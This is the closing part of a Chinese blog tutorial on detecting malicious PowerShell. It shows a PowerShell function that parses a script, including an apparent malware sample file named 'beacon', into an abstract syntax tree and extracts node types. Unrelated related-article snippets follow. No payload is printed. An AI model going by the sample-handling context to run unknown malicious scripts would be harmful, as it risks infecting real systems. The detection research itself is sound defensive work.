运行结果如下图所示,包括保存至“data_ast.csv”文件中。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第18张图片

在这里插入图片描述

五.ParseInput替换Create

利用上述代码在对PS文件解析时,通常会报错误。查了很多资料都无解决方法。

  • 表达式或语句中包含意外的标记
  • CategoryInfo : NotSpecified: ( : ) [], MethodInvocationException

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第19张图片

最后解决发现:是Create会解析Powershell代码,保证其无语法错误才创建代码块。这里使用另一种方法替换,即:

  • https://stackoverflow.com/questions/39909021/parsing-powershell-script-with-ast
$code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)

完整代码如下:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  # 报错:表达式或语句中包含意外的标记
  # 原因:Create需要保证PS代码正确
  # $code = [ScriptBlock]::Create($content)

  $tokens = $null
  $errors = $null
  $code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)


  Write-Output $code

  # 提取AST
  $code.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点(if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.GetHashCode()
  Write-Output $result
  return $result
}

Convert-CodeToAst -str .\data\beacon

六.总结

写到这里这篇文章就介绍介绍,希望对您有所帮助。

  • 一.Powershell概述
    1.高威胁
    2.基础语法
    3.Bypass
  • 二.powershell.one
    1.概念
    2.访问AST
  • 三.抽象语法树可视化
    1.官方示例
    2.代码块的AST抽取
    3.指定PS文件的AST抽取
  • 四.抽象语法树节点提取
    1.提取AST节点
    2.AST节点拼接
    3.循环读取PS并提取AST
  • 五.总结

能看到这里的读者,我说声诚恳的感谢。作者再给一个福利,推荐三个Powershell宝藏网站。

  • https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree
  • https://github.com/lzybkr/ShowPSAst
  • https://github.com/thewhiteninja/deobshell

在这里插入图片描述

这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

欢迎大家讨论,是否觉得这系列文章帮助到您!任何建议都可以评论告知读者,共勉。

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

(By:Eastmount 2022-07-02 夜于火星 http://blog.csdn.net/eastmount/ )

你可能感兴趣的:(系统安全与恶意代码分析,系统安全,安全,PowerShell,恶意代码检测,抽象语法树)

  • 保定影像之街道(七一七) 我_4b6f
    保定影像之街道(七一七)2019年5月17日,星期五。农历己亥年己巳月甲寅日(猪年)四月十三。河北省保定市:瑞祥大街。保定市,古称清苑、上谷、保州、保府。因城池似靴,又称靴城。保定与北京相伴而生,保定之名取自“保卫大都、安定天下”之意。瑞祥大街,南北街道。原名建新路、省印路。一九八一年八月廿九日,保定市革命委员会通告市革(1981年)4号为有利于社会主义现代化建设,便利群众,根据国发(1979)3
  • 令牌桶算法:原理与代码实现 Lill_bin 杂谈网络服务器运维大数据java开发语言后端
    引言令牌桶算法(TokenBucketAlgorithm)是一种网络流量整形(TrafficShaping)和速率限制(RateLimiting)的算法。它能够限制数据传输的平均速率,同时允许某种程度的突发传输。在许多场景中,如网络带宽管理、API速率限制等,令牌桶算法都得到了广泛的应用。原理令牌桶算法的核心思想是使用一个虚拟的“桶”来存储令牌,每个令牌代表一个数据包的传输权限。系统按照固定的速率
  • 等闲识得东风面,万紫千红总是春 荷花亭亭
    春风吹,吹绿了柳树,吹红了桃花,到处万紫千红,美丽极了。朱熹诗:胜日寻芳泗水滨,无边光景一时新。等闲识得东风面,万紫千红总是春。点出了春回大地,百花齐放的美景。“东周出孔丘,南宋有朱熹;中国古文化,泰山与武夷。”朱熹在孔孟儒学的基础上,吸纳佛教、道教思想以及诸子百家的精义,集宋代理学之大成,建构了以“天理”为核心的朱子理学。“问渠那得清如许,为有源头活水来。”朱熹倡导“格物致知”,将儒学思想哲学化
  • 生成式AI:创造性智能的新纪元 Lill_bin 杂谈人工智能分布式zookeeper机器学习算法
    引言随着人工智能技术的飞速发展,生成式AI(GenerativeAI)已经成为一个引人注目的领域。它不仅仅是模仿人类行为,而是通过学习大量的数据,创造出全新的内容,如文本、图像、音乐等。本文将探讨生成式AI的基本原理、应用领域以及它对未来社会可能产生的影响。什么是生成式AI?生成式AI是一种利用机器学习算法,特别是深度学习技术,来生成新的数据样本的人工智能。这些数据样本在统计上与训练数据相似,但又
  • 发字的楷书写法图片_硬笔书法笔顺正确写法,手写示范动态图 Xy Chen 发字的楷书写法图片
    《楷书行书》书法作品欣赏众所周知,要想把字写好,基本笔画是练习的基础,就像是汉字组装零件。这些零件除了位置要对,也要有序地摆放,这样才会更顺手。虽然有人会说字写得好看就好,何必计较笔画顺序呢?确实,观看工整的楷书时无法根据已书写好的字去断定笔顺,而笔顺也不一定和字美丽与否有绝对的关系。然而,不可否认,好的笔顺有助于让字变得更好写,当然也就间接拉近了你与美字的距离。笔顺类型一般而言,书写时的顺序可分
  • 为量产而设计:自动驾驶车辆激光雷达旋转外参在线标定与异常排除策略 智驾机器人技术前线 高精定位与大规模建图自动驾驶算法机器人
    更多精彩内容,请关注公众号:智驾机器人技术前线1.论文信息论文标题:FaultDetectionandExclusionforRobustOnlineCalibrationofVehicletoLiDARRotationParameter作者:JiwonSeok,ChansooKim,PauloResende,BenazouzBradai,andKichunJo作者单位:韩国首尔大学论文链接:ht
  • 规矩 Creationnoends
    规矩,造就美丽。——题记游客们本是一片好心,爱惜小动物,放生松鼠回归自然,这本无可厚非。却没想到的是,由于泰山的松鼠没有天敌,肆意生长,所以,近年来泰山,上的果农们饱受松鼠之灾。这个看似闪耀着道德光芒的行为,却产生了难以预料的恶果。这诡异的转化,究其根源,便在于破坏了大自然的规律。规矩至上,恪守规矩,行者必尊,才会实现真正人类与自然界的和谐。大自然是有秩序运行的物体。荀子云:“天行有常,不为尧存,
  • 《 Java 编程思想》CH02 一切都是对象 Java天天
    用引用操纵对象尽管Java中一切都看作为对象,但是操纵的标识符实际上对象的一个“引用”。Strings;//这里只是创建了一个引用,而不是一个对象Strings=newString("abcd");//使用`new`操作符来创建一个对象,并将其与一个引用相关联Strings="abcd";//字符串可以直接用带引号的文本初始化必须由你创建所有对象使用new操作符创建一个对象存储到什么位置由五个地方
  • 京东优惠券软件赚佣金真的假的 京东优惠券平台赚钱 氧惠超好用
    京东优惠券软件赚佣金是一种通过推广京东优惠券来获取佣金的方式。这种模式在电商行业中比较常见,主要是通过让利给消费者和推广者来提升销量和知名度。氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大礼包,教你如何1年做到百万团队
  • 吴澄注道德经述成·德经·七十章 随便阁主
    德经·七十章吾言甚易知,甚易行。天下莫能知,莫能行。吴澄:老子教人柔弱谦下而已,其言甚易知,其事甚易行也。世降俗末,天下之人莫能知其言之可贵,莫能行柔弱谦下之事者。原成:吾言易知也,易行也。而天下莫之能知也,莫之能行也。原成:吴氏所注迂曲,此章与柔弱谦下没有任何关系,故不取。老子曰:故至数车亡车。是故不欲禄禄若玉,硌硌若石。老子此言“道”衍生万物,万物接受“道”的约束,以“道”做为唯一标准。人做为
  • 开发新系统时,数据库字符集怎么选择对中文的支持最好? New小青龙 数据库mysql字符集
    在新开发的系统时,如果你希望确保中文按拼音顺序正确排序,同时支持更多的特殊字符与符号,下面是对utf8mb4_zh_cn_ci、utf8mb4_unicode_ci和utf8mb4_unicode_520_ci这几种字符集和校对规则的分析以及推荐方案:校对规则分析utf8mb4_zh_cn_ci:特点:这是专为简体中文设计的校对规则,主要考虑了中文拼音的排序需求。它可以在一定程度上支持中文拼音排序
  • Python进阶————闭包与装饰器 记得多吃点 Python进阶知识python开发语言
    闭包与装饰器前言一、函数名的使用1.1函数名作为对象1.2函数名作为实参传递二、闭包2.1闭包作用2.2构成闭包的条件2.3闭包语法格式2.4闭包代码演示2.5nonlocal关键字三、装饰器3.1装饰器介绍与代码演示3.2装饰器的具体使用3.2.1装饰无参无返回值3.2.2装饰有参无返回值3.2.3装饰无参有返回值3.2.4装饰有参有返回值3.2.5装饰不定长参数3.3多个装饰器装饰一个函数3.
  • 开发一个查询功能 -- activiti工作流养成计划(六) 唐田震
    目标:开发一个查询流程列表的功能,体验一下activiti因为上一篇中已经部署了一个流程,所以咱们可以站在使用者的视角,开发一个流程展示页面。再贴一下模块的包结构,与上一篇有点变动,因为activiti作为一个模块,是对外提供api的,主要是供admin模块调用,所以把之前的controller包改成api语义上更为合适。如图image.png一、创建查询流程定义apipackagecom.ruo
  • 基于分布式计算的电商系统设计与实现【系统设计、模型预测、大屏设计、海量数据、Hadoop集群】 王小王-123 hadoop大数据分布式电商系统分析分布式计算
    文章目录==有需要本项目的代码或文档以及全部资源,或者部署调试可以私信博主==项目展示项目介绍目录摘要Abstract1引言1.1研究背景1.2国内外研究现状1.3研究目的1.4研究意义2关键技术理论介绍2.1Hadoop相关组件介绍2.2分布式集群介绍2.3Pyecharts介绍2.4Flask框架3分布式集群搭建及数据准备3.1Hadoop全套组件搭建3.2数据集介绍3.3数据预处理4分布式计
  • 百变大侦探《镜世与灵犀》剧本杀剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为百变大侦探《镜世与灵犀》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复百变大侦探《镜世与灵犀》即可获取查看百变大侦探《镜世与灵犀》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------------
  • python logistic regression_机器学习算法与Python实践之逻辑回归(Logistic Regression) weixin_39702649 pythonlogisticregression
    机器学习算法与Python实践这个系列主要是参考下载地址:https://bbs.pinggu.org/thread-2256090-1-1.html一、逻辑回归(LogisticRegression)Logisticregression(逻辑回归)是当前业界比较常用的机器学习方法,用于估计某种事物的可能性。之前在经典之作《数学之美》中也看到了它用于广告预测,也就是根据某广告被用户点击的可能性,把
  • 【西风不瘦】钟爱的好联赏析(之三百三十)(骋我径寸翰;流藻垂华芬) 西风不瘦
    诗词名联,即上下联出自同一诗词作品,两句正好对偶,自然成联。上联:骋我径寸翰下联:流藻垂华芬上下联都是出自两汉时期诗人曹植的《薤露》。【作者简介】曹植(192-232),字子建,沛国谯(今安徽省亳州市)人。三国曹魏著名文学家,建安文学代表人物。魏武帝曹操之子,魏文帝曹丕之弟,生前曾为陈王,去世后谥号“思”,因此又称陈思王。后人因他文学上的造诣而将他与曹操、曹丕合称为“三曹”,南朝宋文学家谢灵运更有
  • 不同声线配音台词素材女,单人配音视频3分钟左右素材 声优配音圈
    一、不同声线配音台词素材女的常规文章类大纲声线配音是声优们的一项重要技能,不同声线能为不同角色注入不同的个性和特点。以下是一些适合女性声线的台词素材:兼职副业推荐公众号,配音新手圈,声优配音圈,新配音兼职圈,配音就业圈,鼎音副业,有声新手圈,每天更新各种远程工作与在线兼职,职位包括:写手、程序开发、剪辑、设计、翻译、配音、无门槛、插画、翻译、等等。。。每日更新兼职。明朗欢快的台词:“阳光明媚,鸟语
  • 如何使用你的有限资源 姚Fay
    写于2019.9.23三个角度:时间,金钱,人脉。时间,只有对有明确目标的人来说才是短缺资源。第一步,你得有个目标,不管它是什么。不然你只会觉得每天闲得发慌。明确目标后,你会觉得要学的太多了,时间根本不够啊。那么就应该去找到你实现目标的底层逻辑,不断分析每个能力背后支撑的最原始的能力。例如:时间精力管理,营销,一项硬本领(英语)。然后,大刀阔斧,排出优先级,砍掉所有与这几个原始能力修炼不相关的耗费
  • LeetCode78 子集 红毛乌龟 算法刷题算法leetcode数据结构c++
    前言题目:78.子集文档:代码随想录——子集编程语言:C++解题状态:差一点…思路如果把子集问题、组合问题、分割问题都抽象为一棵树的话,那么组合问题和分割问题都是收集树的叶子节点,而子集问题是找树的所有节点!代码classSolution{private:vector>res;vectorpath;voidbacktracking(vector&nums,intstartIndex){res.pu
  • 220715丰盛日记-5组 孙旗 孙旗
    1.思想本周继续消化吸收暑假集中培训的专家报告内容。主要深入学习了山东交通职业学院王建良副院长做的《职教政策与形势任务深化三教改革打造教师教学创新团队》报告和上海工艺美术职业学院王华杰副教授做的《信息化教学设计与开发》报告。王建良副院长从国家教学团队建设背景、政策支持、评审指标以及该院现代物流教学团队(国家级)建设案例等四个方面详细地为我们解读了国家一系列支持、促进职业教育改革发展的政策措施,进一
  • 使用JavaScript读取手机联系人列表:从理论到实践 孔乙己大叔 Web学习javascript智能手机开发语言rebootvip孔乙己大叔
    更多内容前往个人网站:孔乙己大叔在现代Web开发中,随着技术的不断进步,以前看似不可能的任务现在变得可行。例如,使用JavaScript读取手机联系人列表这一功能,在几年前几乎是不可想象的,但现在随着WebAPI的发展,特别是联系人选择器API(ContactsPickerAPI)的引入,这一功能已经可以在一些现代浏览器中实现。本文将深入探讨这一技术,从理论基础到实际代码实现,以及隐私和安全方面的
  • 如何提升爱情中的安全感? 玄晏先生
    吃醋“天下男生千千万,为你吃醋最好看?”大多数女生的心思都要比男生的细腻、敏感,使得“吃醋”这个行为的行使者总是女生。所以当男生吃醋时,女生除了埋怨、无奈外,心底难免会泛起一丝丝被珍惜的甜蜜,安全感满满。正是因为喜欢你,才会与世界上所有竞争对手为敌。外表波澜不惊,内心波涛汹涌。因为懂你的珍贵,才会视作宝贝,才会醋意满满。“吃醋”这一行为彰显了他对你的例外,给足你安全感,这大概就是爱情最美好的样子吧
  • 单片机原理图与PCB设计心得体会 嵌入式大圣 单片机嵌入式硬件
    在电子技术的学习和实践中,单片机原理图与PCB设计是至关重要的环节。通过参与相关项目的设计和制作,我深刻体会到了这两个环节的复杂性和挑战性,同时也收获了许多宝贵的经验和知识。本文将详细介绍我在单片机原理图与PCB设计过程中的心得体会,包括原理设计、PCB布局布线、电磁兼容等方面的内容。目录一、引言二、原理图设计三、PCB设计四、电磁兼容设计五、心得体会一、引言单片机作为一种集成度高、功能强大的微控
  • 为了你,我愿意热爱整个世界 simple涯
    《为了你,我愿意热爱整个世界》:我想去的那个地方,是你的心里。感动千万人的真爱告白我们从未如此相信爱情。为了追到她,他一年内写下了137封情书,超过100万字。为了守护她,他创作了16部长篇小说,4000多万字,成就了网络文学的奇迹。唐家三少真实讲述了他与妻子十六年始终如一的爱情,也在书中完整披露了他从失业青年到明星作家的逆袭之路。磅礴而又深邃的感情,流畅而又通俗的文笔,自强不息奋力拼搏的情怀,为
  • 个性化推荐系统-离线召回模型验证 山水阳泉曲 python功能测试线性代数矩阵推荐算法vue
    文章目录背景前端核心组件模拟操作用户历史行为后端导入依赖启动服务根据uid获取推荐列表相关推荐用户历史记录用户行为数据上报背景计划构建并优化一个覆盖前端与后端的个性化推荐系统中的离线召回模块。此模块旨在通过高效的数据处理与分析,预先筛选出用户可能感兴趣的内容或商品,为后续的实时推荐流程提供丰富且精准的候选集。为了确保实施效果与性能,我们将设计最简前端界面以直观展示召回结果,同时构建后端服务来处理大
  • 强国复兴,有我同行 后东毗董晓丽
    习近平总书记在《习近平谈治国理政》第四卷曾深刻指出:“一百年来,中国共产党团结带领中国人民进行的一切奋斗、一切牺牲、一切创造,归结起来就是一个主题:实现中华民族伟大复兴。”强国复兴正是我们永恒不变的努力目标,国家的强大了我们,我们小家才能,有依靠,对外才有底气,我们在外才有靠山,百年前清末那软弱政府,怎么能让我们在国外出现电影《万里归途》情况时可以安全回到祖国,国强才能民安,如何实现强国之梦,我们
  • 2023-11-02 倪俊卿
    侯庄的传说(故事连载)王大胆一见来了这么多人,还送来这么多好东西,一时间丈二和尚摸不着头脑,不知发生了什么事。张员外走上前深施一礼,问王大胆说这猴子是你家的吗?王大胆如实应答,于是员外就把母猴救女之事原原本本的讲了一遍,对王大胆表示千恩万谢。末了又问了王大胆家几口人,生活怎样,为何住在树林里。王大胆便说家有三个儿子,因生活拮据,家里房屋破漏,院子狭小,为了生计没办法只好住在林子里与动物为伴。张员外
  • 善有善报?是的 翊寒
    秋园是一个平凡而高贵的母亲,像一棵大树,和她早慧善良能干的女儿把家庭支撑起来。在命运面前,她们与大多数中国女性一样,渺小而坚韧,抑或是伟大而柔韧。读完作家杨本芬的《秋园》,最让我感动的是善有善报的那两个画面。在之骅爸爸杨仁受落难以后,一天,满娭毑忽然让秋园改门,非让他们家出一担谷。秋园万般无奈之下,她带之骅去要饭,先去了她的学生朱杏梅的村子,杏梅母亲说:“你们的事,我们都晓得了。莫急,莫急,总要过
  • xss举例和防范措施 abytecoder 开发语言
    跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种网络安全漏洞,攻击者通过在网页中注入恶意脚本,诱使用户执行这些脚本,从而达到窃取用户信息、劫持用户会话、重定向用户请求等目的。XSS攻击有三种主要类型:1.储存型(PersistentXSS):恶意脚本会被永久存储在目标服务器上,如用户评论区中的恶意代码。2.反射型(ReflectedXSS):恶意脚本存在于目标链接中,用户点
  • jsonp 常用util方法 hw1287789687 jsonpjsonp常用方法jsonp callback
    jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
  • 多线程场景 alafqq 多线程
    0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景?0 对多线程有些了解,但是不太清楚具体的应用场景,能简单说一下你遇到的多线程编程的场景吗? Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案 按时间排序 按投票排序 0 0 最典型的如: 1、
  • Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
          安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下,该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中,以方便重用。但是windows用户的操作系统都安装在C盘,把Maven仓库放到C盘是很危险的,为此我们需要修改Maven的本地仓库路径。    
  • placeholder的浏览器兼容 120153216 placeholder
    【前言】 自从html5引入placeholder后,问题就来了, 不支持html5的浏览器也先有这样的效果, 各种兼容,之前考虑,今天测试人员逮住不放, 想了个解决办法,看样子还行,记录一下。   【原理】 不使用placeholder,而是模拟placeholder的效果, 大概就是用focus和focusout效果。   【代码】 <scrip
  • debian_用iso文件创建本地apt源 2002wmj Debian
    1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内,本例是放在本机/iso/目录下 2.创建N个挂载点目录 如下: debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
  • SQLSERVER耗时最长的SQL 357029540 SQL Server
    对于DBA来说,经常要知道存储过程的某些信息: 1.   执行了多少次 2.   执行的执行计划如何 3.   执行的平均读写如何 4.   执行平均需要多少时间 列名          &
  • com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
    今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误,并且工程文件打不开了,在网上找了一下资料,然后按照方法操作了一遍,好了,解决方法如下: 错误提示信息: An error has occurred.See error log for more details. Reason: com/genuitec/
  • 用正则删除文本中的html标签 adminjun javahtml正则表达式去掉html标签
    使用文本编辑器录入文章存入数据中的文本是HTML标签格式,由于业务需要对HTML标签进行去除只保留纯净的文本内容,于是乎Java实现自动过滤。 如下: public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
  • 嵌入式系统设计中常用总线和接口 aijuans linux 基础
                   嵌入式系统设计中常用总线和接口         任何一个微处理器都要与一定数量的部件和外围设备连接,但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接,那么连线
  • Java函数调用方式——按值传递 ayaoxinchao java按值传递对象基础数据类型
    Java使用按值传递的函数调用方式,这往往使我感到迷惑。因为在基础数据类型和对象的传递上,我就会纠结于到底是按值传递,还是按引用传递。其实经过学习,Java在任何地方,都一直发挥着按值传递的本色。   首先,让我们看一看基础数据类型是如何按值传递的。   public static void main(String[] args) { int a = 2;
  • ios音量线性下降 bewithme ios音量
    直接上代码吧   //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
  • 与其怨它不如爱它 bijian1013 选择理想职业规划
            抱怨工作是年轻人的常态,但爱工作才是积极的心态,与其怨它不如爱它。         一般来说,在公司干了一两年后,不少年轻人容易产生怨言,除了具体的埋怨公司“扭门”,埋怨上司无能以外,也有许多人是因为根本不爱自已的那份工作,工作完全成了谋生的手段,跟自已的性格、专业、爱好都相差甚远。  
  • 一边时间不够用一边浪费时间 bingyingao 工作时间浪费
    一方面感觉时间严重不够用,另一方面又在不停的浪费时间。 每一个周末,晚上熬夜看电影到凌晨一点,早上起不来一直睡到10点钟,10点钟起床,吃饭后玩手机到下午一点。 精神还是很差,下午像一直野鬼在城市里晃荡。 为何不尝试晚上10点钟就睡,早上7点就起,时间完全是一样的,把看电影的时间换到早上,精神好,气色好,一天好状态。 控制让自己周末早睡早起,你就成功了一半。 有多少个工作
  • 【Scala八】Scala核心二:隐式转换 bit1129 scala
    Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
  • sudoku slover in Haskell (2) bookjovi haskellsudoku
    继续精简haskell版的sudoku程序,稍微改了一下,这次用了8行,同时性能也提高了很多,对每个空格的所有解不是通过尝试算出来的,而是直接得出。   board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
  • Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
            本篇总结一下两个常用的集合类HashSet和LinkedHashSet。         它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合;之前总结过的java.util.List表示一种元素可重复且有序
  • 读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是,在不破坏封装性的前提下,捕获一个对象的内部状态,并在对象之外保存这个状态,为以后的状态恢复作“备忘”
  • 《RAW格式照片处理专业技法》笔记 cherishLC PS
    注意,这不是教程!仅记录楼主之前不太了解的 一、色彩(空间)管理 作者建议采用ProRGB(色域最广),但camera raw中设为ProRGB,而PS中则在ProRGB的基础上,将gamma值设为了1.8(更符合人眼) 注意:bridge、camera raw怎么设置显示、输出的颜色都是正确的(会读取文件内的颜色配置文件),但用PS输出jpg文件时,必须先用Edit->conv
  • 使用 Git 下载 Spring 源码 编译 for Eclipse crabdave eclipse
    使用 Git 下载 Spring 源码 编译 for Eclipse   1、安装gradle,下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME,配置PATH  %GRADLE_HOME%/bin,cmd,gradle -v   2、spring4 用jdk8 下载 https://jdk8.java.
  • mysql连接拒绝问题 daizj mysql登录权限
    mysql中在其它机器连接mysql服务器时报错问题汇总 一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p   //带-p参数,在下一步进行密码输入 Enter password:    //无字符串输入 ERROR 1045 (28000): Access
  • Google Chrome 为何打压 H.264 dsjt applehtml5chromeGoogle
    Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准,Chrome 将在几个月后正式停止对 H.264 视频解码的支持,全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示,自从 WebM 视频编解码器推出以后,在性能、厂商支持以及独立性方面已经取得了很大的进步,为了与 Chromium 现有支持的編解码器保持一致,Chrome
  • yii 获取控制器名 和方法名 dcj3sjt126com yiiframework
    1. 获取控制器名 在控制器中获取控制器名:  $name = $this->getId(); 在视图中获取控制器名:    $name = Yii::app()->controller->id;    2. 获取动作名  在控制器beforeAction()回调函数中获取动作名:  $name =
  • Android知识总结(二) come_for_dream android
    明天要考试了,速速总结如下   1、Activity的启动模式        standard:每次调用Activity的时候都创建一个(可以有多个相同的实例,也允许多个相同Activity叠加。)        singleTop:可以有多个实例,但是不允许多个相同Activity叠加。即,如果Ac
  • 高洛峰收徒第二期:寻找未来的“技术大牛” ——折腾一年,奖励20万元 gcq511120594 工作项目管理
    高洛峰,兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖! 首期现在的进程刚刚过半,徒弟们真的很棒,人品都没的说,团结互助,学习刻苦,工作认真积极,灵活上进。我几乎会把他们全部留下来,现在已有一多半安排了实际的工作,并取得了很好的成绩。等他们出徒之日,凭他们的能力一定能够拿到高薪,而且我还承诺过一个徒弟,当他拿到大学毕
  • linux expect heipark expect
    1. 创建、编辑文件go.sh   #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact    2. 设置权限   chmod u+x go.sh  3.
  • Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • idea ubuntuxia 乱码 liyonghui160com
      1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个 字体文件。 2.在ubuntu 下可以执行下面操作安装该字体: sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
  • 改良程序的11技巧 pda158 技巧
    有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点,程序你只写一次,但以后会无数次的阅读。当你第二天回头来看你的代码 时,你就要开始阅读它了。当你把代码拿给其他人看时,他必须阅读你的代码。因此,在编写时多花一点时间,你会在阅读它时节省大量的时间。   让我们看一些基本的编程技巧:   尽量保持方法简短 永远永远不要把同一个变量用于多个不同的
  • 300个涵盖IT各方面的免费资源(下)——工作与学习篇 shoothao 创业免费资源学习课程远程工作
    工作与生产效率:   A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
  • 深入浅出RPC uule rpc
    深入浅出RPC-浅出篇 深入浅出RPC-深入篇   RPC Remote Procedure Call Protocol 远程过程调用协议   它是一种通过网络从远程计算机程序上请求服务,而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在,如TCP或UDP,为通信程序之间携带信息数据。在OSI网络通信模型中,RPC跨越了传输层和应用层。RPC使得开发
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他